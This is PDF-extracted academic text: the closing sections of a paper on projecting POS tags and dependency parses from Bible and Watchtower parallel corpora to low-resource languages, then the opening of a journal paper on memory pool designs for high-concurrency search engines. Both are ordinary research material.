word tokens without POS labels. This may happen due to unaligned sentences and words. We then pro- ceed to train models. 4.1 Setup Each of the experiment steps involves a number of choices that we outline in this section. We also de- scribe the baseline systems and upper bounds. POS tagging Below, we present results with POS taggers based on annotation projection with both IBM1 and IBM2; cf. Table 3. We train TnT with de- fault settings on the projected annotations. Note that we use the resulting POS taggers in our dependency parsing experiments in order not to have our parsers assume the existence of POS-annotated corpora. For a more extensive assessment, we refer to the work by Agić et al. (2015) who report baseline and upper bounds. In contrast to their work, we consider two different alignment models and use the UD POS tagset (17 tags), in contrast to the 12 tags of Petrov et al. (2012). This makes our POS tagging problem slightly more challenging, but our parsing models potentially benefit from the extended tagset.14 Dependency parsing We use arc-factored Tur- boParser for all parsing models, applying the same setup as in preprocessing. There are three sets of models: our systems, baselines, and upper bounds. 13Our fork of TurboParser is available from https:// github.com/andersjo/TurboParser. 14For example, the AUX vs. VERB distinction from UD POS does not exist the tagset of Petrov et al. (2012), and neither does NOUN vs. PROPN (proper noun). Our systems are trained on the projected EBC and WTC texts, while the rest—except system: DCA- PROJ (see below)—are trained on the (delexical- ized) source-language treebanks. To avoid a bias toward languages with big tree- banks and to make our experiments tractable, we randomly subsample all training sets to a maximum of 20k sentences. In the multi-source systems, this means a uniform sample from all sources up to 20k sentences. This means our comparison is fair, and that our systems do not have the advantage of more training data over our baselines. Our systems We report on four different cross- lingual systems, alternating the use of word aligners (IBM1, IBM2) and the structures we project, as they can be either (i) arc-factored weight matrices from the parser (GRAPHS) or (ii) the single-best trees pro- vided by the parser after decoding (TREES). See the if-clause in Algorithm 2. We tune two parameters for these four systems us- ing English as development set, confidence estima- tion and normalization, and we report the best setups only. For the IBM1-based systems, we use the word alignment probabilities in the arc projection, but we use unit votes in POS voting. The opposite yields the best IBM2 scores: binarizing the alignment scores in dependency projection, while weight-voting the POS tags. We also evaluated a number of different normalization techniques in projection, only to ar- rive at standardization and softmax as by far the best choices. Baselines and upper bounds We compare our systems to three competitive baselines, as well as three informed upper bounds or oracles. First, we list our baselines. DELEX-MS: This is the multi-source direct delexicalized parser transfer baseline of McDonald et al. (2011).15 DCA-PROJ: This is the direct correspondence as- sumption (DCA)-based approach to projection, i.e., the de facto standard for projecting dependencies. First introduced by Hwa et al. (2005), it was recently elucidated by Tiedemann (2014), whose implemen- tation we follow here. In contrast to our approach, 15Referred to as multi-dir in the original paper. 307 https://github.com/andersjo/TurboParser https://github.com/andersjo/TurboParser DCA projects trees on a source-target sentence pair basis, relying on heuristics and spurious nodes or edges to maintain the tree structure. In the setup, we basically plug DCA into our projection-voting pipeline instead of our own method. REPARSE: For this baseline, we parse a target sentence using multiple single-source delexicalized parsers. Then, we collect the output trees in a graph, unit-voting the individual edge weights, and finally using DMST to compute the best dependency tree (Sagae and Lavie, 2006). Now, we explain the three upper bounds: DELEX-SB: This result is using the best single- source delexicalized system for a given target lan- guage following McDonald et al. (2013). We parse a target with multiple single-source delexicalized parsers, and select the best-performing one. SELF-TRAIN: For this result we parse the target- language EBC and WTC data, train parsers on the output predictions, and evaluate the resulting parsers on the evaluation data. Note this result is available only for the source languages. Also, note that while we refer to this as self-training, we do not concate- nate the EBC/WTC training data with the source treebank data. This upper bound tells us something about the usefulness of the parallel corpus texts. FULL: Direct in-language supervision, only avail- able for the source languages. We train parsers on the source treebanks, and use them to parse the source test sets. Evaluation All our datasets—projected, training, and test sets—contain only the following CoNLL- X features: ID, FORM, CPOSTAG, and HEAD.16 For simplicity, we do not predict dependency labels (DEPREL), and we only report unlabeled attach- ment scores (UAS). The POS taggers are evaluated for accuracy. We use our IBM1 taggers for all the baselines and upper bounds. 4.2 Results Our average results are presented in Figure 2, in- cluding broken down by language family, the lan- 16http://ilk.uvt.nl/conll/#dataformat Languages Baselines All Sources Targets IE Non-IE DELEX-MS 45.43? 45.64? 44.59? 49.53? 34.88† DCA-PROJ 47.87† 47.05? 47.19? 51.33† 40.66† REPARSE 47.79? 47.87? 47.47? 51.34? 38.67? Our systems IBM1 GRAPHS 52.82? 53.01? 52.07? 55.44? 46.08? TREES 53.47? 53.49? 53.38? 55.91? 47.19? IBM2 GRAPHS 46.44† 46.14? 44.39? 49.54† 38.47† TREES 46.48† 46.67? 45.54? 49.58† 38.93? Upper bounds DELEX-SB 48.52? 48.64? 48.02? 50.91? 42.35? SELF-TRAIN — 58.38? — — — FULL — 72.55? — — — Table 2: Overview of the parsing experiment results for the 25 languages in EBC ∩ WTC. We report the best av- erage UAS score per system and language subset. IE: Indo-European languages, †: EBC, ?: WTC. guages for which we had training data (Sources) and those for which we only had test data (Targets). We see that our systems are substantially bet- ter than both multi-source delexicalized transfer, DCA, and reparsing based on delexicalized trans- fer models. Focusing on our system results, we see that projection with IBM1 leads to better models than projection with IBM2. We also note that our improvements are biggest with non-Indo-European languages. Our IBM1-based parsers top the ones using IBM2 alignment by 6 points UAS on Indo- European languages, while the difference amounts to almost 10 points UAS on non-Indo-European lan- guages (cf. Table 2). This difference in scores ex- poses a systematic bias towards more closely related languages in work using even more advanced word alignment (Tiedemann and Agić, 2016). The detailed results using the Watchtower Corpus are listed in Table 3, where we also list the POS tagging accuracies. Note that these are not directly comparable to Agić et al. (2015), since they use a more coarse-grained tagset, and the results listed here are using WTC. We list the detailed results with the Bible Corpus online.17 The tendencies are the same, but the results are slightly lower almost con- sistently across the board. Finally, we observe that our results are also bet- ter than those that can be obtained using a predictive model to select the best source language for delexi- 17https://bitbucket.org/lowlands/release 308 http://ilk.uvt.nl/conll/#dataformat https://bitbucket.org/lowlands/release POS MULTI-PROJ Baselines Upper bounds Sources IBM1 IBM2 IBM1: GRAPHS TREES IBM2: GRAPHS TREES DELEX-MS DCA-PROJ REPARSE DELEX-SB SELF-TRAIN FULL Arabic 54.40 44.48 39.55 39.24 28.74 29.58 21.15 32.14 26.24 32.59 pl 49.47 70.79 Bulgarian 70.02 56.02 49.79 49.02 39.15 38.54 48.37 37.18 52.09 49.32 da 53.46 74.01 Croatian 76.56 74.21 55.96 55.33 49.20 50.34 45.49 50.56 48.69 46.68 cs 54.77 68.69 Czech 79.67 72.01 52.42 53.09 42.80 43.33 47.99 44.36 49.65 47.80 sl 57.77 70.36 Danish 86.20 84.66 61.27 62.26 54.82 56.41 55.96 58.64 57.13 56.21 no 64.69 71.23 Dutch 69.51 70.10 57.75 58.93 54.82 55.28 54.35 55.03 56.46 56.64 pt 61.64 72.23 English 78.92 77.22 60.00 61.21 56.46 56.72 53.87 57.12 55.13 52.62 no 66.53 76.18 Farsi 33.66 32.86 26.98 24.49 19.27 18.79 19.48 12.26 20.83 24.65 ar 22.62 64.86 Finnish 69.63 58.29 42.00 43.19 31.91 32.04 41.52 35.60 44.91 43.20 no 51.23 59.35 French 80.36 75.67 56.64 57.79 49.71 48.76 51.53 51.47 51.85 53.49 it 59.91 75.36 German 69.97 62.48 45.73 46.54 38.73 37.88 45.79 36.70 47.21 45.12 no 50.62 67.36 Hebrew 63.01 51.78 45.40 45.59 34.02 35.46 25.02 36.34 27.68 41.71 id 51.37 60.26 Hindi 50.52 42.11 16.84 17.05 15.34 14.36 21.04 10.77 20.90 25.06 fi 44.17 82.63 Indonesian 75.49 70.75 58.18 59.58 48.05 49.76 39.67 52.29 44.80 48.43 he 65.91 73.74 Italian 85.93 82.35 65.84 66.29 60.81 61.25 58.06 63.57 60.03 61.91 es 69.37 79.21 Norwegian 85.84 83.57 66.80 67.30 63.56 64.60 60.11 64.37 62.21 61.12 da 72.42 79.08 Polish 73.84 69.08 62.62 63.46 53.51 56.55 54.87 55.40 56.37 54.31 cs 63.80 76.37 Portuguese 84.22 82.33 63.94 64.91 61.01 61.59 56.99 63.16 58.27 57.79 es 68.80 77.66 Slovene 78.36 74.40 60.69 61.51 53.61 54.15 52.53 54.80 54.15 53.43 cs 63.76 73.63 Spanish 86.39 84.05 64.24 65.39 61.34 61.09 55.87 61.90 59.30 56.25 it 70.16 75.73 Swedish 86.28 84.43 65.28 66.52 60.74 62.16 57.48 62.45 59.94 61.12 no 66.80 74.86 Targets Estonian 75.76 68.76 63.43 65.94 51.31 57.58 48.48 58.41 54.34 58.62 no — — Greek 75.04 63.57 60.86 61.69 50.19 50.06 54.90 52.95 59.29 55.27 no — — Hungarian 73.70 69.52 47.80 50.84 44.83 45.38 46.66 42.33 49.85 47.62 fi — — Quechua 19.49 15.19 26.17 25.93 23.15 22.74 21.67 27.48 22.87 24.30 pl — — Romanian 78.08 74.67 62.08 62.52 52.46 51.95 51.23 54.78 51.01 54.27 id — — Tamil 44.27 35.23 22.41 22.16 21.61 17.34 34.07 15.98 34.67 37.99 hi — — Averages All 70.56 65.18 51.88 52.51 45.23 45.69 45.34 46.22 47.62 48.43 — — Sources 73.28 68.23 53.2 53.75 46.55 47.08 46.05 47.43 48.28 49.02 58.54 72.55 Targets 61.06 54.49 47.13 48.18 40.59 40.84 42.84 41.99 45.34 46.35 — — Table 3: POS tagging accuracies and UAS parsing scores for the models built using WTC data. The results are split for source and target languages. All baselines and upper bounds use IBM1 POS taggers, while our MULTI-PROJ systems use their respective IBM1 or IBM2 taggers. calized transfer (Rosa and Žabokrtský, 2015); and better than what can be obtained using an oracle (DELEX-SB) to select the source language. Direct supervision (FULL) upper bound unsur- prisingly records the highest scores in the experi- ment, as it uses biased in-language and in-domain training data. We also experiment with learning curves for direct supervision, with a goal of estab- lishing the amount of manually annotated sentences needed to beat our cross-lingual systems. We find that for most languages this number falls within the range of 100-400 in-domain sentences. 5 Discussion Function words In UD, a subset of function words—tags: ADP, AUX, CONJ, SCONJ, DET, PUNCT—have to be leaves in the dependency trees, unless, e.g., they participate in multiword expres- sions. Our predictions show some violations of this constraint (less than 1% of all words with these POS), but this ratio is similar to the amount of vi- olations found in the test data. Projectivity The UD treebanks are in general largely projective. Our UD test languages have an average of 89% fully projective sentences. How- ever, with IBM1 for example, we only predict 55% of all sentences to be projective. Regardless of the differences in UAS, we observe a corpus effect in the difference of projectivity of the predictions between using EBC (65%) and WTC (55%). We attribute the higher level of projectivity of EBC-projected tree- banks to Bible sentences being shorter. The least projective predictions are Farsi (17%) and Hindi (19%), for which we also obtain the low- est UASs. This may be a consequence of our naive tokenization, yielding unreliable alignments. How- ever, projectivity correlates more with UAS (ρ = 0.56) than with POS prediction accuracy (ρ = 0.34). Dependency length We observe that the average edge length on IBM1 and WTC is of 2.95, while for EBC it is 2.67. The average gold edge length is 309 3.6—which is significantly higher at p < 0.05 (Stu- dent’s t-test). However, the variance in gold edge length is about 1.2 times the deviation of predicted edge length. In other words, gold edges are often longer and more far-reaching. This difference in- dicates our predictions have worse recall for longer dependencies such as subordinate clauses, while be- ing more accurate in local, phrasal contexts. POS errors Unlike most previous work on cross- lingual dependency parsing, and following the no- table exception of McDonald et al. (2011), we rely on POS predictions from cross-lingual transfer mod- els. One may hypothesize that there is a significant error propagation from erroneous POS projection. We observe, however, that about 40% of wrong POS predictions are nevertheless assigned the right syn- tactic head. We argue that the fairly uniform noise on the POS labels helps the parsers regularize over the POS-dependency relations. Possible improvements We treat POS and syn- tactic dependencies as two separate annotation lay- ers and project them independently in our approach. Moreover, we project edge scores for dependencies, in contrast to only the single-best source POS tags. Johannsen et al. (2016) introduce an approach to joint projection of POS and dependencies, showing that exploiting the interactions between the two lay- ers yields even better cross-lingual parsers. Their approach also accounts for transferring tag distribu- tions instead of single-best POS tags. All the parsers in our experiments are restricted to 20k training sentences. EBC and WTC texts offer up to 120k training instances per language. We observe limited benefits of going beyond our training set cap, indicating a more elaborate instance selection-based approach would be more beneficial than just adding more training data. In our dependency graph projection, we normal- ize the weights per sentence. For future develop- ment, we note that corpus-level normalization might achieve the same balancing effect while still preserv- ing possibly important language-specific signals re- garding structural disambiguations. EBC and WTC constitute a (hopefully small) sub- set of the publicly available multilingual parallel corpora. The outdated EBC texts can be replaced by newer ones, and the EBC itself replaced or aug- mented by other online sources of Bible translations. Other sources include the UN Declaration of Human Rights, translated to 467 languages,18 and reposito- ries of movie subtitles, software localization files, and various other parallel resources, such as OPUS (Tiedemann, 2012).19 Our approach is language- independent and would benefit from extension to datasets beyond EBC and WTC. 6 Related work POS tagging While projection annotation of POS labels goes back to Yarowsky’s seminal work, Das and Petrov (2011) recently renewed interest in this problem. Das and Petrov (2011) go beyond our ap- proach to POS annotation by combining annotation projection and unsupervised learning techniques, but they restrict themselves to Indo-European lan- guages and a coarser tagset. Li et al. (2012) intro- duce an approach that leverages potentially noisy, but sizeable POS tag dictionaries in the form of Wik- tionaries for 9 resource-rich languages. Garrette et al. (2013) also consider the problem of learning POS taggers for truly low-resource languages, but sug- gest crowdsourcing such POS tag dictionaries. Finally, Agić et al. (2015) were the first to intro- duce the idea of learning models for more than a dozen truly low-resource languages in one go, and our contribution can be seen as a non-trivial exten- sion of theirs. Parsing With the exception of Zeman and Resnik (2008), initial work on cross-lingual dependency parsing focused on annotation projection (Hwa et al., 2005; Spreyer et al., 2010). McDonald et al. (2011) and Søgaard (2011) simultaneously took up the idea of delexicalized transfer after Zeman and Resnik (2008), but more importantly, they also intro- duced the idea of multi-source cross-lingual transfer in the context of dependency parsing. McDonald et al. (2011) were the first to combine annotation pro- jection and multi-source transfer, the approach taken in this paper. Annotation projection has been explored in the context of cross-lingual dependency parsing since Hwa et al. (2005). Notable approaches include the 18http://www.ohchr.org/EN/UDHR/Pages/ SearchByLang.aspx 19http://opus.lingfil.uu.se/ 310 http://www.ohchr.org/EN/UDHR/Pages/SearchByLang.aspx http://www.ohchr.org/EN/UDHR/Pages/SearchByLang.aspx http://opus.lingfil.uu.se/ soft projection of reliable dependencies by Li et al. (2014), and the work of Ma and Xia (2014), who make use of the source-side distributions through a training objective function. Tiedemann and Agić (2016) provide a more de- tailed overview of model transfer and annotation projection, while introducing a competitive machine translation-based approach to synthesizing depen- dency treebanks. In their work, we note the IBM4 word alignments favor more closely related lan- guages, and that building machine translation sys- tems requires parallel data in quantities that far sur- pass EBC and WTC combined. The best results reported to date were presented by Rasooli and Collins (2015). They use the inter- section of languages represented in the Google de- pendency treebanks project and the languages rep- resented in the Europarl corpus. Consequently, their approach—similar to all the other approaches listed in this section—is potentially biased toward closely related Indo-European languages. 7 Conclusions We introduced a novel, yet simple and heuristics- free, method for inducing POS taggers and depen- dency parsers for truly low-resource languages. We only assume the availability of a translation of a set of documents that have been translated into many languages. The novelty of our dependency projec- tion method consists in projecting edge scores rather than edges, and specifically in projecting these anno- tations from multiple sources rather than from only one source. While we built models for more than a hundred languages during our experiments, we eval- uated our approach across 30 languages for which we had test data. The results show that our approach is superior to commonly used transfer methods. Acknowledgements We thank the editors and the anonymous reviewers for their valuable comments. This research is funded by the ERC Starting Grant LOWLANDS (#313695). References Željko Agić, Dirk Hovy, and Anders Søgaard. 2015. If All You Have is a Bit of the Bible: Learning POS Tag- gers for Truly Low-Resource Languages. In ACL. Thorsten Brants. 2000. TnT: A Statistical Part-of- Speech Tagger. In ANLP. Christos Christodouloupoulos and Mark Steedman. 2014. A Massively Parallel Corpus: The Bible in 100 Languages. Language Resources and Evaluation, 49(2). Dipanjan Das and Slav Petrov. 2011. Unsupervised Part- of-Speech Tagging with Bilingual Graph-Based Pro- jections. In ACL. Chris Dyer, Victor Chahuneau, and Noah A. Smith. 2013. A Simple, Fast, and Effective Reparameteriza- tion of IBM Model 2. In ACL. Dan Garrette, Jason Mielens, and Jason Baldridge. 2013. Real-World Semi-Supervised Learning of POS- Taggers for Low-Resource Languages. In ACL. Rebecca Hwa, Philip Resnik, Amy Weinberg, Clara Cabezas, and Okan Kolak. 2005. Bootstrapping Parsers via Syntactic Projection Across Parallel Texts. Natural Language Engineering, 11(3). Anders Johannsen, Željko Agić, and Anders Søgaard. 2016. Joint Part-of-Speech and Dependency Projec- tion from Multiple Sources. In ACL. Shen Li, João Graça, and Ben Taskar. 2012. Wiki-ly Supervised Part-of-Speech Tagging. In EMNLP. Zhenghua Li, Min Zhang, and Wenliang Chen. 2014. Soft Cross-lingual Syntax Projection for Dependency Parsing. In COLING. Xuezhe Ma and Fei Xia. 2014. Unsupervised Depen- dency Parsing with Transferring Distribution via Par- allel Guidance and Entropy Regularization. In ACL. André F. T. Martins, Miguel Almeida, and Noah A. Smith. 2013. Turning on the Turbo: Fast Third-Order Non-Projective Turbo Parsers. In ACL. Ryan McDonald, Koby Crammer, and Fernando Pereira. 2005. Online Large-Margin Training of Dependency Parsers. In ACL. Ryan McDonald, Slav Petrov, and Keith Hall. 2011. Multi-Source Transfer of Delexicalized Dependency Parsers. In EMNLP. Ryan McDonald, Joakim Nivre, Yvonne Quirmbach- Brundage, Yoav Goldberg, Dipanjan Das, Kuzman Ganchev, Keith Hall, Slav Petrov, Hao Zhang, Oscar Täckström, Claudia Bedini, Núria Bertomeu Castelló, and Jungmee Lee. 2013. Universal Dependency An- notation for Multilingual Parsing. In ACL. Joakim Nivre, Željko Agić, Maria Jesus Aranzabe, Masayuki Asahara, Aitziber Atutxa, Miguel Balles- teros, John Bauer, Kepa Bengoetxea, Riyaz Ah- mad Bhat, Cristina Bosco, Sam Bowman, Giuseppe G. A. Celano, Miriam Connor, Marie-Catherine de Marneffe, Arantza Diaz de Ilarraza, Kaja Do- brovoljc, Timothy Dozat, Tomaž Erjavec, Richárd 311 Farkas, Jennifer Foster, Daniel Galbraith, Filip Gin- ter, Iakes Goenaga, Koldo Gojenola, Yoav Gold- berg, Berta Gonzales, Bruno Guillaume, Jan Hajič, Dag Haug, Radu Ion, Elena Irimia, Anders Jo- hannsen, Hiroshi Kanayama, Jenna Kanerva, Simon Krek, Veronika Laippala, Alessandro Lenci, Nikola Ljubešić, Teresa Lynn, Christopher Manning, Cătălina Mărănduc, David Mareček, Héctor Martı́nez Alonso, Jan Mašek, Yuji Matsumoto, Ryan McDonald, Anna Missilä, Verginica Mititelu, Yusuke Miyao, Simon- etta Montemagni, Shunsuke Mori, Hanna Nurmi, Petya Osenova, Lilja Øvrelid, Elena Pascual, Marco Passarotti, Cenel-Augusto Perez, Slav Petrov, Jussi Piitulainen, Barbara Plank, Martin Popel, Prokopis Prokopidis, Sampo Pyysalo, Loganathan Ramasamy, Rudolf Rosa, Shadi Saleh, Sebastian Schuster, Wolf- gang Seeker, Mojgan Seraji, Natalia Silveira, Maria Simi, Radu Simionescu, Katalin Simkó, Kiril Simov, Aaron Smith, Jan Štěpánek, Alane Suhr, Zsolt Szántó, Takaaki Tanaka, Reut Tsarfaty, Sumire Uematsu, Lar- raitz Uria, Viktor Varga, Veronika Vincze, Zdeněk Žabokrtský, Daniel Zeman, and Hanzhi Zhu. 2015. Universal Dependencies 1.2. Robert Östling. 2015. Word Order Typology Through Multilingual Word Alignment. In ACL. Slav Petrov, Dipanjan Das, and Ryan McDonald. 2012. A Universal Part-of-Speech Tagset. In LREC. Mohammad Sadegh Rasooli and Michael Collins. 2015. Density-Driven Cross-Lingual Transfer of Depen- dency Parsers. In EMNLP. Rudolf Rosa and Zdeněk Žabokrtský. 2015. KLcpos3: A Language Similarity Measure for Delexicalized Parser Transfer. In ACL. Kenji Sagae and Alon Lavie. 2006. Parser Combination by Reparsing. In NAACL. Kathrin Spreyer, Lilja Øvrelid, and Jonas Kuhn. 2010. Training Parsers on Partial Trees: A Cross-Language Comparison. In LREC. Anders Søgaard. 2011. Data Point Selection for Cross- Language Adaptation of Dependency Parsers. In ACL. Jörg Tiedemann and Željko Agić. 2016. Synthetic Tree- banking for Cross-Lingual Dependency Parsing. Jour- nal of Artificial Intelligence Research, 55. Jörg Tiedemann, Željko Agić, and Joakim Nivre. 2014. Treebank Translation for Cross-Lingual Parser Induc- tion. In CoNLL. Jörg Tiedemann. 2012. Parallel Data, Tools and Inter- faces in OPUS. In LREC. Jörg Tiedemann. 2014. Rediscovering Annotation Pro- jection for Cross-Lingual Parser Induction. In COL- ING. Dániel Varga, László Németh, Péter Halácsy, András Ko- rnai, Viktor Trón, and Viktor Nagy. 2005. Parallel Corpora for Medium Density Languages. In RANLP. David Yarowsky, Grace Ngai, and Richard Wicentowski. 2001. Inducing Multilingual Text Analysis Tools via Robust Projection Across Aligned Corpora. In NAACL. Daniel Zeman and Philip Resnik. 2008. Cross-Language Parser Adaptation Between Related Languages. In IJCNLP Workshop on NLP for Less Privileged Lan- guages. 312 work_5skuz4byfra4hjw2nr3q35de7u ---- 68 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Research on Optimization of memory pool management for high concurrent service requests LIU Pingping, LU Zhaopan School of Computer Science and Engineering Xi’an Technological University, Xi’an 710021,China Email:1341369601@qq.com Abstract. In order to quickly and accurately return the information to the user after the keyword are entered, and to effectively reduce the effect on the performance of the program when the search system allocates and deal locates memory frequently under the high concurrency, the Recoverable Fixed Length Memory Pool, Recoverable Variable Length Memory Pool and Allocate Not Free Memory Pool were designed. According to the different scenes features of the search engine. The result shows that, compared with the default system memory allocator, the efficiency of the Recoverable Fixed Length Memory Pool is increased by 70.20% ,the efficiency of the Recoverable Variable Length Memory Pool is increased by 13.84% and the efficiency of the Allocate Not Free Memory Pool is increased by 90.80%. Keywords: High Concurrency, search engine, memory pool, distributor 1. Introductiong The search engine is one of the most important applications of the Internet, which involved in information retrieval, distributed processing, semantic web, data mining etc. The reasonable data structure design, the index and the high concurrent system structure are all the factors that influence the query speed. The basic principle of the search engine has been very stable, but in terms of service, quality and performance needs to be optimized. Most of traditional search engines use keyword matching mode, the system manages memory when the application is not released too frequently, but in the face of massive data processing and storage, search engines seem powerless. There are some drawbacks that directly using the system call Malloc/ Free and New/Delete[1] to distribute and release the memory. For example, calling the Malloc/New system in accordance with the “first match” and “best match” or other algorithms in free memory block table to find a free memory, the memory usage is not high; The system may need to merge free memory blocks when Free / Delete is called, which will result in extra time and space overhead; It is easy to produce a large number of memory fragments when used frequently, which reduces the efficiency and stability of the program; Memory more prone to leaks[2] that caused by memory size continues to increase and memory exhausted. For memory allocation problem, Wang Xiaoyin, a professor of Xi’an University of Posts and telecommunications, analysis and research about the method and principle of the establishment of the memory pool in the article of Implementation and Application of the Memory Pool in Linux Kernel[3]. Memory allocated in memory pool does not need to release, it will be released Research on Optimization of memory pool management for high concurrent service requests 69 when the memory pool is destroyed. Avantages:It speeds up memory allocation, when block of memory is enough, only conduct simple operation such as size judgment and pointer offset; Small memory payloads are high, require less additional information; The memory pool allocated memory usually do not need a separate release, but a unified recovery; In addition to using memory allocation functions instead of malloc, no other special conventions are used. Therefore, to compare of the traditional search engine memory allocation and the memory poolallocation. In this paper, different memory pools are designed for different application scenarios, it managememory allocation to get the fastest allocate and release speed. For the user’s query, the system’s memory management is completely taken over by the programmer, which is more conducive to investigate problem and optimize system, and quickly return a satisfied result for customer. 2. Pinciples and Key Technologies of Search Engine Search engine is based on the information extracted from the web site to establish the database, search the relevant records of user query condition matching, and then return the results to the user according to a certain order. The working principle[4] of search engine is divided into four steps: First, using web crawler technology[5] to automatically grab the web page from the Internet, then analysis the original web page, and set up an index database, and finally searching and sorting in the index database .When there are multiple threads operating, if the system only has one CPU, it can not be carried out more than one thread at the same time, it can only divided the running time of CPU into several periods, then allocate the period of time to each thread, a thread code is run in a time, other threads are hanged up, this way we call concurrency. In the condition of high concurrency, the search system frequently allocate and recover memory will degrade the performance of program and the memory is used in a particular way, and pay the cost of performance on the function that is not required. For long-running background service system, the performance decrease mainly due to the default memory management is a universal, and general memory management usually consider many factors, including the thread, size, recovery time, distribution, frequency and so on. For this reason, it is common to consider use of the memory pool to manage memory allocation, rather than simply using New/Delete, Malloc/Free for dynamic memory allocation. By designing a dedicated memory pool to allocate specific memory and optimize performance in different search application scenarios of search system, and to enhance the mass data storage and search speed, in order to solve the problem of universal memory. 2.1 Principle of memory pool Memory pool[6] is a way of memory allocation, is a device that can dynamically allocate memory. It can only be used by a specific kernel component (that is, the owner of the pool). Owners usually do not directly use the memory pool, when the common memory allocation fails, the kernel call a particular memory pool function to extract the memory pool, in order to get the extra memory. So the memory pool is only a memory of the kernel memory, used at a specific time. As shown in figure 1, the memory pool contains a total of 4 memory blocks. When the memory pool is initially generated, only one block of memory is applied to the system, and the returned pointer acts as the head of the entire memory pool. After the application of the continuous demand for memory, memory pool judgment need to dynamically expand, then once again to apply for a new memory block of the system, and all of these memory blocks linked by pointers. 70 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 For the operating system, it has been allocated four equal-sized memory blocks for the application program. For example, on the fourth block of memory to enlarge, which contains a part of the memory pool information and three equal size memory pool units. The unit 1 and unit 3 are free, unit 2 has been allocated. When application program need to allocate a unit size of memory through the memory pool, only need a simple traversal of all pool size information, then locate quickly the free memory pool block unit. Then according to the size of the block position information directly locate the first free unit address, return the address and mark the next free unit; Marking directly the corresponding memory unit of the memory pool size information is free when the application program release a memory pool unit. Figure.1 The Working Principle of Memory Pool 2.2 Small object allocation technology Due to the application of memory block size of memory pool is uncertain, usually directly use the API of New and Malloc to apply for allocating memory. It is not effective for the small object allocation, when frequently used will cause a large amount of memory fragmentation and then reduce the performance, so the small object memory allocation technology[7] suitable for the small object memory allocation is used here. The size and number of blocks can be set in the construction period of the small object distributor. The Chunk layer contains logical information, it can configured and returned the block from memory. Once there is no free block in the Chunk layer, the function returns zero. Small Object Pool layer contains a vector, Chunk objects stored inside, the Chunk layer has been extended. There is a chunk queue, which stores all the information, there are two Chunk pointers, one pointing to the currently available Chunk, one pointing to the current with the release of a pointer. 2.3 Scene analysis of search engine system In this paper, analyzing the characteristics of the three scenes, Fixed length scene, Size is not fixed scene and Multiple allocation scene, designing the corresponding memory pool. 1) Fixed length scene In the existing search engine system, cache design takes advantage of the hash tables, Original system use the New and Delete functions for the allocation and release of each node of the hash table, and the size of the node is fixed, according to the allocation and release of the fixed size nodes, a memory pool is designed to improve the speed of cache allocation and release. A lot of places use the Map of STL[9] in Research on Optimization of memory pool management for high concurrent service requests 71 the present search engine system, and the allocation and release of memory of each node in the Map is managed by the distributor in the STL, take over the fixed node memory allocation and release by itself, enhance efficiency, easy to debug. Based on the above two scenarios, the common is that how to deal with node fixed size, design a small object dispenser to distribute and release the fixed size memory node. 2) Size is not fixed scene In the cache management of the currents earch system, the search results are put into the cache, which is helpful for the next search, the size of each node in the cache is uncertain, and the time to enter the cache and propose cache can not be estimated. In the update module of the current search system, which manages the update and delete of the document, but the size of the document and the time of the update is unknown. For this scene, it can design a recoverable variable length memory pool, the lock can be added to deal with base on the characteristics of cache multi thread[10]. 3) Multiple allocation scene The current search engine will return a result within 10M size after input a keyword, and a lot of information that comes with results will be allocated and released by using New and Delete function, it cause that the New function used frequently, and affect efficiency and bring memory fragments[11]. After analysis, the search engine return the result sat the same time, memory is frequently allocated, the number of release carried out only when the results of the query are returned, so the factor of frequent distribution should be considered, and the total capacity is not more than 10M, therefore, it is consider to allocate a large chunk of memory, after which all of the small memory is allocated, and finally released through the interface. Based on this scene design allocate not free memory pool. 3. Memory pool design and realize based on the high concurrency Three scenarios are obtained by analyzing the current search engines: Hash table insert delete, Cache update and document update module, Query result return. Three memory pools are designed for the three scenarios: Recoverable Fixed Length Memory Pool and Recoverable Variable Length Memory Pool and Allocate Not Free Memory Pool were designed. The design structure of the search system memory pool is shown in Figure 2. Figure.2 The Design Framework of Memory Pool of Search System 72 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 3.1 Recoverable Fixed Length Memory Pool Recoverable Fixed Length Memory Pool is Small object distributor, it divided into 4 layers structure. As shown in Figure 3, the bottom layer is the Chunk object, each Chunk manages a large chunk of memory, which contains an integer number of fixed size block. Chunk contains logical information, the user can configure and return the block according to it. When the Chunk is no longer remaining blocks, the configuration fails and returns to zero. The second layer is Fix Allocate, which base on the first layer, using the known vector to expand the first layer and ensure that the size of the distribution can be extended. The third layer is Small Object Allocator, which provide universal distribution and return function. The third layer expand base on the second layer, it provide multiple second layer objects, it make the fixed length of the distribution technology turn into a variable length distribution technology. The fourth layer is Small Object, It made a package for the third layer, which provides a number of generic interfaces for the third layer and some common interface, extend it into a multi thread available distributor. Through layer by layer expansion, not only to ensure the release efficiency of the distribution, but also to better package the internal structure together, it not visible to the outside. By providing a common interface, to make it used like the operating system comes with the default memory. Figure.3 The Structure of Small Object Distributor 3.2 Recoverable Variable Length Memory Pool Recovery variable length memory pool is a multi-threaded, variable length, recyclable memory pool, similar to hash table. A linked list indicates an assignable size range, each element in the list is a specific size of memory block pointer, which point to a list of memory blocks, to find specific head pointer by aligning, and then assign a node outside in the list. The elements in the range will be allocated through the New, when released, it will be returned to the pool for the next allocation, and beyond the range of elements also be allocated through New, but when released, it directly call Delete, and return to the operating system. About the factors of thread, add lock to ensure the thread safety after the specified by the constructor. Mainly includes Block Header layer, tragCtrlUnit layer and RecycleLitePool layer. The structure of the graph is shown in figure 4. Block Header layer is the bottom of the distribution structure, nCtrlIndex indicates the size of block Research on Optimization of memory pool management for high concurrent service requests 73 distribution, pNextBlock indicates the next block, the structure is linked list structure, the whole structure is Union type, which save space and improve efficiency. The tragCtrlUnit layer is a headpointer of each BlockHeader layer, and also contains a member that indicates the number of BlockHeader objects. RecycleLitePool layer contains the thread element, the lock element, thetagCtrlUnit layer pointer, some count elements and a memory distributor, default for the New distribution and delete function to delete. Figure.4 The Structure of Recyclelitepool 3.3 Allocate Not Free Memory Pool Allocate Not Free Memory Pool is divided into four layers: Memory Chunk layer: The bottom of the allocation block, there are three members inside, one indicates block size, one indicates location of initial address, one indicates currently available location. Chain of Memory Chunk layer: Memory Chunk object is organized into a two-way linked list. Simple Allocate Poilcy layer: This layer accept the request of distribution, change the size to be allocated not less than the size of Memory Chunk, and then added to the two-way linked list, the pointers of current distribution block point to the new block. StagePool layer: This layer is the outermost layer, The default template parameter is Simple AllocatePolicy type, which provides external interface for distribution and release. The overall structure of the StagePool contains a Chunk type 